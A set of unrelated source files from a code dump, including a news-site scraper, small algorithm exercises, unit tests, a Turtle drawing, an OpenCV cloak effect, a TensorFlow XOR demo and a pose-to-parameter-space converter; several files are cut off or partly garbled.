'entry-content full-content',\n 'entry clearfix', \n 'entry-content', \n 'entry_content',\n 'entry-content print-only',\n 'entry-body',\n 'entry', \n 'entry entry-content',\n 'event-text', \n 'entry-content-text',\n 'field-item even',\n 'field-body',\n 'infopage-news',\n 'td-post-content', \n 'the-content cf',\n 'thecontent',\n 'td-post-content td-pb-padding-side',\n 'ntText', \n 'post-single', \n 'post-content entry-content cf', \n 'post-body entry-content', \n 'post_entry', \n 'post-content clearfix', \n 'post-bodycopy clearfix',\n 'post-single-content box mark-links',\n 'post-9141 post type-post status-publish format-standard has-post-thumbnail hentry category-world tag-fake-news tag-featured tag-satire',\n 'vw-post-content clearfix',\n 'wpb_wrapper',\n 'single-box clearfix entry-content',\n 'sqs-block-content',\n 'left relative'\n ]\n\n news.article = []\n for i in range(len(class_list_paragraph)):\n if (content.find('div',{'class': class_list_paragraph[i]})): \n# print (class_list_paragraph[i])\n paragraphs = content.find('',{'class': class_list_paragraph[i]})\n if (paragraphs.findAll('p')):\n# print (paragraphs)\n for paragraph in paragraphs.findAll('p'):\n news.article.append(paragraph.text)\n# print (news.article)\n break\n else: \n news.article = []\n\n class_list_author = [\n 'postmetadata',\n 'author-article-link',\n 'field-author',\n 'name',\n 'url fn n',\n 'author vcard',\n 'author left-edge',\n 'author has-bio',\n 'author',\n 'artAuthor',\n 'post-author',\n 'meta pf-author',\n 'author-name vcard fn'\n ]\n\n for i in range(len(class_list_author)):\n if (content.find('',{'class': class_list_author[i]})):\n# print (class_list_author[i])\n news.author = content.find(\"\",{'class':class_list_author[i]}).text \n# print (news.author)\n break\n else:\n news.author = None\n\n\n class_list_date = [\n 'entry-date published',\n 'entry-date published updated',\n 'content-published-mobile',\n 'entry-date',\n 'entry-meta',\n 'entry-meta-date updated',\n 'byline byline-left ',\n 'pub_date',\n 'post-date updated',\n 'timestamp',\n 'time',\n 'article-details',\n 'article_date',\n 'artData',\n 'field-post-date',\n ]\n\n for i in range(len(class_list_date)):\n if (content.find('',{'class': class_list_date[i]})):\n# print(class_list_date[i])\n news.createdDate = content.find('',{'class': class_list_date[i]})\n# print (news.createdDate.text)\n try:\n news.createdDate = (parser.parse(news.createdDate['datetime'])).isoformat()\n except:\n news.createdDate = (parser.parse(news.createdDate.text)).isoformat()\n\n break\n else:\n news.createdDate = None\n\n return\n\n\n\n# link = 'http://www.thedailysheeple.com/astronomers-detect-strange-radio-signals-from-nearby-star_072017'\n# FAKE:\n# link = 'http://awm.com/will-this-latest-blunder-be-the-final-nail-in-the-coffin-for-the-worst-show-in-tv-history/?utm_medium=homepage&utm_source=homepage1'\n# link = 'http://americannews.com/beware-new-doll-meant-indoctrinate-sharia-law-children-coming-home/'\n# UNRELIABLE:\n# link = 'http://www.anonews.co/cop-drugs-frame/'\n# link = 'http://anonhq.com/london-terror-attacks-brits-celebrating-beer-hero/'\n# SATIRE\n# link = 'http://empirenews.net/hillary-clinton-undergoes-sex-change-operation-so-she-has-a-better-chance-at-winning-2020-election/'\n# link = 'http://realnewsrightnow.com/2017/05/texas-lawmaker-called-ice-mother-law-dinner-table-dispute/'\n# Conspiracy:\n# link = 'http://anotherdayintheempire.com/distraction-du-jour-trump-punches-cnn/'\n# link = 'http://conservativefiringline.com/va-removes-top-2-officials-manchester-va-hospital/'\n# HATE:\n# link = 'http://www.frontpagemag.com/fpm/267321/nevertrump-nostalgia-hillary-never-was-daniel-greenfield'\n# link = 'http://www.vdare.com/articles/said-in-spanish-dual-citizen-actress-activist-tells-illegals-how-not-to-get-arrested-a-new-app-for-dreamers-the-america-thing-etc'\n# BIAS\n# link = 'http://www.americanthinker.com/articles/2017/07/europe_downward_now_the_bavarians_want_to_leave.html'\n# link = 'http://100percentfedup.com/watch-rep-steve-kings-bombshell-answer-trumps-wall-hasnt-built-yet-video/'\n# Junk:\n# link = 'http://www.celebtricity.com/nicki-minaj-files-10m-lawsuit-against-remy-ma-for-using-her-voice-in-diss-song-on-itunes/'\n# link = 'https://www.scoopwhoop.com/india-inhuman-rape-cases/#.6j9dfreps'\n# Political:\n# link = 'http://thelastlineofdefense.org/breaking-president-trump-wants-you-to-know-the-truth-about-agenda-21/'\n# link = 'http://www.defenddemocracy.press/one-week-after-mosuls-liberation-horror-of-us-siege-continues-to-unfold/'\n# CLICKBAIT\n# link = 'http://americablog.com/2017/07/cbo-gop-obamacare-repeal-22m-uninsured-13k-deductible-premiums-soar-older.html'\nlink = 'http://americanlookout.com/rms-corruption-more-obama-officials-scrutinized-in-unmasking-probe-video/'\nscraping(link)\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"XiaoshengLiang/Project","sub_path":"Scraping_for_all/Scraping0720.py","file_name":"Scraping0720.py","file_ext":"py","file_size_in_byte":10445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"37472438018","text":"'''\r\n2020来恩杯:第 5 题 找出可能的钝角三角形的最长周长\r\nAuthor:Yotrew Wing\r\n2022/10/09\r\nhttps://github.com/yotrew\r\n\r\n钝角三角形:a^2+b^2c^2\r\n直角三角形:a^2+b^2=c^2\r\n三角形:a+b>c\r\n\r\n解法:\r\na一定是输入资料的最小值,c一定是输入资料的最大值,只须找b\r\n\r\n解法2:\r\n若直接a是最小值, b,c最大值2个,答案会对吗?(会有测资造成此条件错误吗?)\r\n'''\r\n\r\nn=int(input())\r\nedge=list(map(int,input().split(\" \")))\r\nedge.sort()\r\n#print(edge)\r\na=edge[0]\r\nc=edge[-1]\r\n\r\nfor i in range(len(edge)-2,0,-1): #n-1~1,因为要找最大值,所以b从最后倒数第2个开始\r\n b=edge[i]\r\n #print(a,b,c,a**2,b**2,c**2,(a+b+c))\r\n if a**2+b**2=1 and next_row <=8 and next_column >=1 and next_column <=8:\r\n result +=1\r\n\r\nprint(result)","repo_name":"philoleben/HufsAlgorithm2021","sub_path":"04_Implementation/왕실의 나이트_세인.py","file_name":"왕실의 나이트_세인.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"12609655718","text":"dis ={\"I\":1,\"V\":5,\"X\":10,\"L\":50,\"C\":100,\"D\":500,\"M\":1000}\r\nstr=input(\"enter the roman no\")\r\nprev=0\r\ncur=0\r\nres=0\r\nfor i in range (len(str)-1,-1,-1):\r\n cur=dis[str[i]]\r\n if (cur list[int]:\n\n arr = []\n\n bottom = len(matrix) - 1\n right = len(matrix[0]) - 1\n\n top, left = 0, 0\n\n if bottom < 1:\n raise ValueError(\"m should be greater than 1\")\n\n if right + 1 > 10:\n raise ValueError(\"n should be less than 10\")\n\n while True:\n if left > right:\n break\n\n # top row\n for i in range(left, right + 1):\n arr.append(matrix[top][i])\n top += 1\n\n if top > bottom:\n break\n\n # right column\n for i in range(top, bottom + 1):\n arr.append(matrix[i][right])\n right -= 1\n\n if left > right:\n break\n\n # bottom row\n for i in range(right, left - 1, -1):\n arr.append(matrix[bottom][i])\n bottom -= 1\n\n if top > bottom:\n break\n\n # left column\n for i in range(bottom, top - 1, -1):\n arr.append(matrix[i][left])\n left += 1\n\n return arr\n","repo_name":"Zygmut/programming_problems","sub_path":"Spiral matrix/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"24524515664","text":"import uuid\n\nimport pytest\n\nfrom account import Account\n\n\ndef test_account_deposit():\n acc = Account(uuid.uuid4())\n\n acc.deposit(100)\n\n assert acc.balance == 100\n\n\ndef test_account_withdrawal_enough_balance():\n acc = Account(uuid.uuid4(), balance=100)\n\n acc.withdrawal(100)\n\n assert acc.balance == 0\n\n\ndef test_account_withdrawal_short_balance():\n acc = Account(uuid.uuid4())\n\n with pytest.raises(BalanceTooLow):\n acc.withdrawal(100)\n\n\ndef test_account_history_log():\n acc_no = uuid.uuid4()\n acc = Account(acc_no, balance=100)\n acc.withdrawal(100)\n with pytest.raises(BalanceTooLow):\n acc.withdrawal(100)\n acc.deposit(100)\n cash = acc.close()\n\n assert cash == 100\n assert acc.history == sorted(acc.history) # is it sorted?\n assert [x.message for x in acc.history] == [\n f\"Account {acc_no} opened with balance 100\",\n \"Withdrawal 100\",\n \"Withdrawal 100 failed. BalanceTooLow\",\n \"Deposit 100\",\n f\"Account {acc_no} closed. Returned 100 cash\",\n ]\n","repo_name":"CodingDojoSilesia/banking-kata","sub_path":"test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"24718857408","text":"# /usr/bin/env python3\n# -*- coding: utf-8 (ü) -*-\n\"\"\"!\n@file Vector3.py\n\n@author Olaf Simon\n@date 14.4.2022\n\n@brief Provides functions extending the python 'math' library\n\"\"\"\n\nimport math\n\ndef normSquare(data: []):\n res = 0\n for i in data:\n res = res + i**2\n return res\n\ndef norm(data: []):\n return math.sqrt(normSquare(data))\n\ndef tan2(r, phi):\n \"\"\"! @brief Delivers a touple (y, x) of cartesian coordinates from given magnitude r and angle phi\n The order is chosen that way for compatibility to the invers function of phi = math.atan2(y, x) using r=1!\n \"\"\" \n return (r*math.sin(phi), r*math.cos(phi)) \n\n\nif __name__ == '__main__':\n \n print(\"- BibPi math functions \")\n print(\" - Norm, magnitude or length of an iterable class e.g. 'list'. Test deliveres 5\")\n print(norm([3, 4]))\n print(\" - Function tan2 delivering a tuple of (y, x). It is the inverse function of math.atan2(y, x). Test uses (y=4, x=3)\")\n v = (4, 3)\n r = norm(v)\n phi = math.atan2(v[0], v[1])\n print(tan2(r, phi))\n","repo_name":"OlafSimon/me2grid","sub_path":"library/me2grid/BibPy/mathlib/mathext.py","file_name":"mathext.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"5774212299","text":"import datetime\n\n\ndef counter(func):\n def wrapper(*args):\n start = datetime.datetime.now()\n res = func(*args)\n finish = datetime.datetime.now() - start\n print(finish)\n return res\n return wrapper\n\n@counter\ndef longest_words1(file):\n with open(file, encoding=\"utf-8\") as text:\n cont = text.read().split()\n word_length = 0\n final_result = []\n for i in cont:\n if len(i) > word_length:\n word_length = len(i)\n final_result.clear()\n final_result.append(i)\n elif len(i) == word_length:\n final_result.append(i)\n return final_result\n\n@counter\ndef longest_words2(file):\n with open(file, encoding='utf-8') as text:\n words = text.read().split()\n max_length = len(max(words, key=len))\n sought_words = [word for word in words if len(word) == max_length]\n if len(sought_words) == 1:\n return sought_words[0]\n return sought_words\n\nfile = \"article.txt\"\nprint('1', longest_words1(file))\nprint('2', longest_words2(file))\n\n\n","repo_name":"shvike/1-Codewars","sub_path":"Decorator.py","file_name":"Decorator.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"40910814855","text":"import numpy as np\nimport scipy.stats\nimport matplotlib.pyplot as plt\nfrom uncertainties import ufloat\n\n# part a) --------------------------\nL = ufloat(0.7, 0.014)\nh = ufloat(0.03, 0.003)\nb = ufloat(0.04, 0.0004)\nF = ufloat(80, 0.8)\ndelta = ufloat(0.008, 0.00008)\n\nI = b * h ** 3 / 12\nE = F * L ** 3 / (3 * delta * I)\nE /= 1E9 #present in GPa\nprint(\"E analytic: \", E)\n\n\n# part b) ----------------------------------\nL_base = 0.7\nh_base = 0.03\nb_base = 0.04\nF_base = 80\ndelta_base = 0.008\n\n\nE_x = np.linspace(E.n - 4 * E.s, E.n + 4 * E.s, num=200)\nE_y = scipy.stats.norm.pdf(E_x, E.n, E.s)\nplt.plot(E_x, E_y, color='orange', label=\"Analytical\")\n\n\nN = 10000\nE_results = np.zeros(N)\nfor i in range(N):\n rand_nums = np.random.standard_normal(5)\n\n L = L_base + rand_nums[0] * 0.014\n h = h_base + rand_nums[1] * 0.003\n b = b_base + rand_nums[2] * 0.0004\n F = F_base + rand_nums[3] * 0.8\n delta = delta_base + rand_nums[4] * 0.00008\n\n I = b * h ** 3 / 12\n E_results[i] = F * L ** 3 / (3 * delta * I)\n\nE_results /= 1E9 #present in GPA\nplt.hist(E_results, bins=30, density=True, label=\"Simulated\", histtype='step', color='#0000ff')\n\nplt.xlabel(\"E (GPa)\")\nplt.ylabel(r\"Probability density (GPa$ ^{-1}$)\")\nplt.title(\"PDF for E, determined analytically and by Monte Carlo simulation\")\n\nE_avg = np.average(E_results)\nE_uncer = np.std(E_results)\n# plt.axvline(E_avg, color='c', label=\"Average simulated E\") #cyan\n# plt.axvline(E_avg + E_uncer, color='c', dashes=(5, 5), label=r\"Average \\pm 1\\sigma\")\n# plt.axvline(E_avg - E_uncer, color='c', dashes=(5,5))\n\nplt.legend()\n\nplt.savefig(f'Q2.png', bbox_inches='tight')\nprint(E_avg)\nprint(E_uncer)\n# plt.show()\n","repo_name":"jesseli2002/MECH306Tutorial3","sub_path":"q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"22246053479","text":"\"\"\"\nEvan Galli et Maxence Lécard\nCe module contient le code chargé du dessin du decor\nTheme: Hiver\n\"\"\"\n\nimport turtle\nimport random\nimport math\nimport itertools\n\nimport formes\nimport cartes\n\n\ndef main(screenX: int, screenY: int, t: turtle.Turtle):\n \"\"\"Le decor dessine avec la tortue t\"\"\"\n\n leftScreen = screenX / -2\n rightScreen = -leftScreen\n bottomScreen = screenY / -2\n\n # On trace le sol\n solHauteur = 250\n formes.rectangle(leftScreen, bottomScreen, 1000, solHauteur, \"#EFEDED\", t)\n\n turtle.bgcolor(\"midnightblue\") # On defini la couleur du fond (ciel)\n\n # On trace les bonhommes de neige\n etoilesLeftY = bonhommeDeNeige(leftScreen + 50, bottomScreen + 100, t)\n etoilesRightY = bonhommeDeNeige(rightScreen - 150, bottomScreen + 100, t)\n\n # Generation et affichage des etoiles\n tailleEtoiles = 25 # Taille maximale d'une etoile\n gapEtoiles = tailleEtoiles * 2 # Espacement entre chaque coordonnees d'etoile\n coordonneesEtoiles = generateEtoiles(\n # Etoiles a gauche\n leftScreen, # X\n etoilesLeftY, # Y\n abs(leftScreen - cartes.xGrille) - tailleEtoiles, # W\n screenY - abs(etoilesLeftY) - tailleEtoiles, # H\n gapEtoiles, # Espacement\n random.randint(10, 20), # Nb\n )\n coordonneesEtoiles += generateEtoiles(\n # Etoiles a droite\n cartes.xGrille + cartes.longueurGrille,\n etoilesRightY,\n abs(rightScreen + cartes.xGrille) - tailleEtoiles,\n screenY - abs(etoilesRightY) - tailleEtoiles,\n gapEtoiles,\n random.randint(10, 20),\n )\n etoiles(coordonneesEtoiles, turtle.Turtle(visible=False))\n\n\ndef generateEtoiles(left, bottom, width, height, gap, quantity):\n \"\"\"Generes une liste de n tuples (x,y,s)\n dont les coordonnees sont comprise dans le rect\n tout en respectant un espacement minimum\"\"\"\n\n # On divise toutes les valeurs par le gap\n # Afin de s'assurer que les etoiles ne se touchent pas\n leftWG = math.ceil(left / gap)\n rightWG = math.floor((left + width) / gap)\n bottomWG = math.ceil(bottom / gap)\n topWG = math.floor((bottom + height) / gap)\n\n # On calcul l'ensemble des coordonnees possibles\n coordonnees = list(itertools.product(range(leftWG, rightWG + 1), range(bottomWG, topWG + 1)))\n\n # On selection n couples parmis les coordonnees possibles,\n # on re-multiplie les coordonnees precedemment divisee par le gap\n # et on genere une taille aleatoire\n return [(coor[0] * gap, coor[1] * gap, random.randint(10, 25)) for coor in random.sample(coordonnees, min(quantity, len(coordonnees)))]\n\n\ndef etoiles(infos, t):\n \"\"\"Dessine les etoiles de coordonnees et tailles definies\"\"\"\n t.clear()\n for info in infos:\n formes.etoile(info[0], info[1], info[2], (255, random.randint(200, 230), 0), t, w=1)\n\n # On actualise l'affichage toute les demie-secondes\n turtle.ontimer(lambda: etoiles(infos, t), t=500)\n\n\ndef bonhommeDeNeige(x, y, t, diametre=100):\n \"\"\"Dessine un bonhomme de neige\n Le parametre optionnel diametre correspond au diametre de la premiere boule de neige\"\"\"\n diametre2 = diametre * 0.75 # Diametre de la 2e\n diametre3 = diametre * 0.50 # Diametre de la 3e\n x2 = x + (diametre - diametre2) / 2 # Coordonnee x (du pt en bas à gauche) de la 2e boule de neige\n x3 = x + (diametre - diametre3) / 2 # Coordonnee x (du pt en bas à gauche) de la 3e boule de neige\n y2 = y + diametre2 # Coordonnee y (du pt en bas a gauche) de la 2e boule de neige\n y3 = y2 + diametre3 + (diametre / 10) # Coordonnee y (du pt en bas à gauche) de la 3e boule de neige\n\n # batons qui forment les bras du bonhomme de neige\n angleBaton = 30\n formes.rectangle(x2, y2 + diametre2 / 2, diametre / 2, diametre * 0.05, \"brown\", t, a=180 - angleBaton)\n formes.rectangle(x2 + diametre2, y2 + diametre2 / 2, diametre / 2, diametre * 0.05, \"brown\", t, a=angleBaton)\n\n # boules de neiges qui forment le corps du bonhomme\n formes.rond(x, y, diametre, \"white\", t)\n formes.rond(x2, y2, diametre2, \"white\", t)\n formes.rond(x3, y3, diametre3, \"white\", t)\n\n # carotte du bonhomme de neige\n hCarotte = diametre * 0.05\n formes.triangle(x3 + diametre3 / 2, y3 + diametre3 / 3 + hCarotte, hCarotte, \"orange\", t, a=80, aDepart=270)\n\n # yeux sur le corps du bonhomme\n rayonYeux = diametre * 0.03\n yYeux = y3 + 2 * diametre3 / 3\n formes.rond(x3 + diametre3 / 6 - rayonYeux, yYeux, rayonYeux * 2, \"black\", t)\n formes.rond(x3 + 5 * diametre3 / 6 - rayonYeux, yYeux, rayonYeux * 2, \"black\", t)\n\n # boutons sur le corps du bonhomme\n rayonBouton = diametre * 0.04\n ecartBoutons = diametre * 0.25\n yButton = y + ecartBoutons\n for i in range(3):\n formes.rond(x + diametre / 2 - rayonBouton, yButton + i * ecartBoutons, rayonBouton * 2, \"black\", t)\n\n return y3 + diametre3\n","repo_name":"Other-Project/PeiP1-Memory","sub_path":"decor.py","file_name":"decor.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"23944686260","text":"# Практическое задание №2:\n# Дана дата в формате dd.mm.yyyy, например: 02.11.2013. Ваша задача — вывести дату в текстовом виде,\n# например: второе ноября 2013 года.\n# Склонением пренебречь (2000 года, 2010 года)\n\ndays = {\n '01': 'первое', '11': 'одиннадцатое', '21': 'двадцать первое',\n '02': 'второе', '12': 'двенадцатое', '22': 'двадцать второе',\n '03': 'третье', '13': 'тринадцатое', '23': 'двадцать третье',\n '04': 'четвертое', '14': 'четырнадцатое', '24': 'двадцать четвертое',\n '05': 'пятое', '15': 'пятнадцатое', '25': 'двадцать пятое',\n '06': 'шестое', '16': 'шестнадцатое', '26': 'двадцать шестое',\n '07': 'седьмое', '17': 'семнадцатое', '27': 'двадцать седьмое',\n '08': 'восьмое', '18': 'восемнадцатое', '28': 'двадцать восьмое',\n '09': 'девятое', '19': 'девятнадцатое', '29': 'двадцать девятое',\n '10': 'десятое', '20': 'двадцатое', '30': 'тридцатое',\n '31': 'тридцать первое',\n}\n\nmonths = {\n '01': 'января', '07': 'июля',\n '02': 'февраля', '08': 'августа',\n '03': 'марта', '09': 'сентября',\n '04': 'апреля', '10': 'октября',\n '05': 'мая', '11': 'ноября',\n '06': 'июня', '12': 'декабря',\n}\n\nusers_date = input('Введите дату в формате ХХ.ХХ.ХХХХ:\\n>>> ')\nday, month, year = users_date.split('.')\n\nprint(f'{days[day]} {months[month]} {year} года')","repo_name":"AllIWantIsNotAvailable/GeekBrains_PythonLanguageBasics","sub_path":"Lesson4-BuiltIn_types_and_operations_with_them/Code/Practice_task/Practice_Task_05.py","file_name":"Practice_Task_05.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"10434392705","text":"\"\"\"\nARE YOU FAN OF HARRY POTTER...?\nProject By..Akshay7802.\nEnjoy..!!\n\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport time\n\n\n\n## Reading the webcam\ncap = cv2.VideoCapture(0)\n## Allowing System to sleep for 5 sec before webcam starts :\ntime.sleep(3)\ncount = 0\nbackground = 0\n## Capturing the background in range :\nfor i in range(60):\n ret,background = cap.read()\nbackground = np.flip(background,axis=1)\n\n## Reading the images from the webcam\nwhile(cap.isOpened()):\n ret, img = cap.read()\n if not ret:\n break\n count+=1\n img = np.flip(img,axis=1)\n\n ## Converting the color space from BGR(BLUE,GREEEN,RED) to HSV(HUE,SATURATION,VALUE)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n ## Generating mask to detect red color\n lowerRed = np.array([110,50,50])\n upperRed = np.array([120,255,255])\n masked1 = cv2.inRange(hsv,lowerRed,upperRed)\n\n lowerRed = np.array([120,50,50])\n upperRed = np.array([130,255,255])\n masked2 = cv2.inRange(hsv,lowerRed,upperRed)\n\n masked1 = masked1+masked2\n\n # Refining the mask corresponding to the detected red color\n masked1 = cv2.morphologyEx(masked1, cv2.MORPH_OPEN, np.ones((3,3),np.uint8),iterations=2)\n masked1 = cv2.dilate(masked1,np.ones((3,3),np.uint8),iterations = 1)\n masked2 = cv2.bitwise_not(masked1)\n\n # Generating the final output\n res1 = cv2.bitwise_and(background,background,mask=masked1)\n res2 = cv2.bitwise_and(img,img,mask=masked2)\n finalOutput = cv2.addWeighted(res1,1,res2,1,0)\n\n cv2.imshow(\"Harry Potter's invisible secret revealed\",finalOutput)\n ##key = cv2.waitKey(10)\n if(cv2.waitKey(1)==ord(\"q\")):#press q to stop.\n break\n","repo_name":"akshay7802/Invisible-opencv","sub_path":"invisible.py","file_name":"invisible.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"33866681490","text":"import tensorflow as tf\nimport numpy as np\n\n# tensorboard를 사용해보자!\nx_data = [[0, 0],\n [0, 1],\n [1, 0],\n [1, 1]]\ny_data = [0, 1, 1, 0]\n\nx_data = np.array(x_data, dtype=np.float32)\ny_data = np.reshape(y_data, newshape=[4, 1])\nX = tf.placeholder(dtype=tf.float32, shape=[None, 2])\nY = tf.placeholder(dtype=tf.float32, shape=[None, 1])\n\nwith tf.name_scope('layer1') as scope:\n W1 = tf.Variable(initial_value=tf.random_normal([2, 2]), dtype=tf.float32, name='weight1')\n b1 = tf.Variable(tf.random_normal([2]), dtype=tf.float32, name='bias1')\n layer1 = tf.sigmoid(tf.matmul(X, W1) + b1)\n w1_hist = tf.summary.histogram('weight1', W1) # select tensor to log\n l1_hist = tf.summary.histogram('layer1', layer1) # select tensor to log\nwith tf.name_scope('layer2') as scope:\n W2 = tf.Variable(initial_value=tf.random_normal([2, 1]), dtype=tf.float32, name='weight2')\n b2 = tf.Variable(tf.random_normal([1]), dtype=tf.float32, name='bias2')\n hx = tf.sigmoid(tf.matmul(layer1, W2) + b2)\n\ncost = - tf.reduce_mean(Y * tf.log(hx) + (1 - Y) * tf.log(1 - hx)) # 김성훈 교수님 강의\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)\ntrain = optimizer.minimize(cost)\npred = tf.cast(hx > 0.5, dtype=tf.float32)\nacc = tf.reduce_mean(tf.cast(tf.equal(pred, Y), tf.float32))\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n# w1_hist = tf.summary.histogram('weight1', W1) # select tensor to log\ncost_sum = tf.summary.scalar('cost', cost) # select tensor to log\nsummary = tf.summary.merge_all() # merge all summary\nwriter = tf.summary.FileWriter('./logs') # create writer, 이 타이밍에 파일 생성\n# writer.add_graph(sess.graph)\n\nfor step in range(501):\n # _, cost_val, acc_val = sess.run([train, cost, acc], feed_dict={X: x_data, Y: y_data})\n # w1_hist = tf.summary.histogram('weight1', W1) # select tensor to log\n # cost_sum = tf.summary.scalar('cost', cost) # select tensor to log\n # summary = tf.summary.merge_all() # merge all summary\n # writer = tf.summary.FileWriter('./logs') # create writer를 반복문 안에서 돌리지 말자.\n writer.add_graph(sess.graph) # 그래프 추가\n s, cost_val, _ = sess.run([summary, cost, train], feed_dict={X: x_data, Y: y_data})\n if step % 100 == 0:\n print(step, cost_val)\n writer.add_summary(s, global_step=step) # summary 추가\n\nW1_val, b1_val, W2_val, b2_val = sess.run([W1, b1, W2, b2])\nprint(W1_val)\nprint(b1_val)\nprint(W2_val)\nprint(b2_val)\n# print(acc_val)\n","repo_name":"SilverQ/dl_study","sub_path":"hunkim/lab09-2.py","file_name":"lab09-2.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32059544960","text":"import glob\nimport json\nimport os\nimport argparse\nimport numpy as np\nfrom PIL import Image, ImageDraw, ImageFont\nfrom sklearn.preprocessing import MinMaxScaler\n\nPOSE_BODY_25_PAIRS_RENDER_GPU = \\\n [1, 8, 1, 2, 1, 5, 2, 3, 3, 4, 5, 6, 6, 7, 8, 9, 9, 10, 10, 11,\n 8, 12, 12, 13, 13, 14, 1, 0, 0, 15, 15, 17, 0, 16, 16, 18, 14,\n 19, 19, 20, 14, 21, 11, 22, 22, 23, 11, 24]\n\nPOSE_BODY_25_COLORS_RENDER_GPU = \\\n [255, 0, 85,\n 255, 0, 0,\n 255, 85, 0,\n 255, 170, 0,\n 255, 255, 0,\n 170, 255, 0,\n 85, 255, 0,\n 0, 255, 0,\n 255, 0, 0,\n 0, 255, 85,\n 0, 255, 170,\n 0, 255, 255,\n 0, 170, 255,\n 0, 85, 255,\n 0, 0, 255,\n 255, 0, 170,\n 170, 0, 255,\n 255, 0, 255,\n 85, 0, 255,\n 0, 0, 255,\n 0, 0, 255,\n 0, 0, 255,\n 0, 255, 255,\n 0, 255, 255,\n 0, 255, 255]\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Convert poses to Parameter Space to Human Action Recognition\"\n )\n\n parser.add_argument(\"--poses_base_dir\", type=str,\n default='/home/murilo/dataset/KTH',\n help=\"Name of directory where input points are located.\")\n\n parser.add_argument(\"--input_dir\", type=str,\n default='2DPoses',\n help=\"Name of directory to output computed features.\")\n\n parser.add_argument(\"--output_dir\", type=str,\n default='2DPoses_SpaceParam',\n help=\"Name of directory to output computed features.\")\n\n parser.add_argument(\"--output_images_dir\", type=str,\n default='2DPoses_SpaceParam_Images',\n help=\"Name of directory to output Parameter Space images.\")\n\n parser.add_argument(\"--image_height\", type=int,\n default='240',\n help=\"(Frame Size)Image height to compute max distance in Parameter Space.\")\n\n parser.add_argument(\"--image_width\", type=int,\n default='320',\n help=\"(Frame Size)Image width to compute max distance in Parameter Space.\")\n\n parser.add_argument(\"--save_image\", type=int,\n default='1',\n help=\"Whether save image with points in Parameter Space.\")\n\n parser.add_argument(\"--draw_body_ids\", type=int,\n default='1',\n help=\"Whether draw body joint ids in image with points in Parameter Space.\")\n\n parser.add_argument(\"--perform_minmax\", type=int,\n default='0',\n help=\"Whether perform Min Max Scaler in data.\")\n\n args = parser.parse_args()\n convert_parameter_space(args)\n\n\ndef convert_parameter_space(args):\n # here compute image diagonal = max distance in Parameter Space\n max_distance = int(((args.image_height**2) + (args.image_width**2))**(1/2))\n print(max_distance)\n\n thetas = np.linspace(-np.pi / 2, np.pi / 2, 180)\n\n poses_dir = os.path.join(args.poses_base_dir, args.input_dir)\n\n frames_ctd = 0\n poses_files = sorted(glob.glob(poses_dir + \"/**/*.json\", recursive=True))\n print('Frames to process: %i' % len(poses_files))\n for poses_file in poses_files:\n if frames_ctd % 100 == 0:\n print('Frame: %i from: %i' % (frames_ctd, len(poses_files)))\n print(poses_file)\n\n body_parts = read_body_parts_file(poses_file)\n if len(body_parts) > 0:\n file_name_points = os.path.basename(poses_file)\n points_space_parameter_dir = poses_file.replace(args.input_dir, args.output_dir)\n points_space_parameter_dir = os.path.dirname(points_space_parameter_dir)\n points_space_parameter_name = os.path.join(points_space_parameter_dir, file_name_points)\n if not os.path.exists(points_space_parameter_dir):\n os.makedirs(points_space_parameter_dir)\n\n # compute parameter space points and draw image with points\n img_parameter_space, points_parameter_space \\\n = compute_parameter_space(body_parts, max_distance, thetas, args.draw_body_ids)\n\n if args.perform_minmax:\n scaler = MinMaxScaler()\n scaler.fit(np.array(list(points_parameter_space.values())))\n a = scaler.transform(np.array(list(points_parameter_space.values())))\n #points_parameter_space_norm = {}\n for i in range(0, 14, 1):\n points_parameter_space[i] = tuple(a[i])\n\n with open(points_space_parameter_name, 'w') as fjson:\n json.dump(points_parameter_space, fjson)\n\n if args.save_image:\n file_name_img = os.path.basename(poses_file)\n file_name_img = file_name_img.replace('_keypoints.json', '.png')\n img_space_parameter_dir = poses_file.replace(args.input_dir, args.output_images_dir)\n img_space_parameter_dir = os.path.dirname(img_space_parameter_dir)\n img_space_parameter_full_name = os.path.join(img_space_parameter_dir, file_name_img)\n if not os.path.exists(img_space_parameter_dir):\n os.makedirs(img_space_parameter_dir)\n img_parameter_space.save(img_space_parameter_full_name)\n\n frames_ctd = frames_ctd + 1\n\n\ndef read_body_parts_file(key_points_file):\n body_parts_int = {}\n\n # Read json pose points\n with open(key_points_file) as f:\n data = json.load(f)\n\n body_parts = data['part_candidates'][0]\n if len(body_parts) > 0:\n\n for key, value in body_parts.items():\n body_parts_int[int(key)] = [item for item in value]\n\n return body_parts_int\n\n\ndef compute_parameter_space(body_parts, max_distance, thetas, draw_body_ids=True):\n # Create image degrees x max_distance\n img_parameter_space = 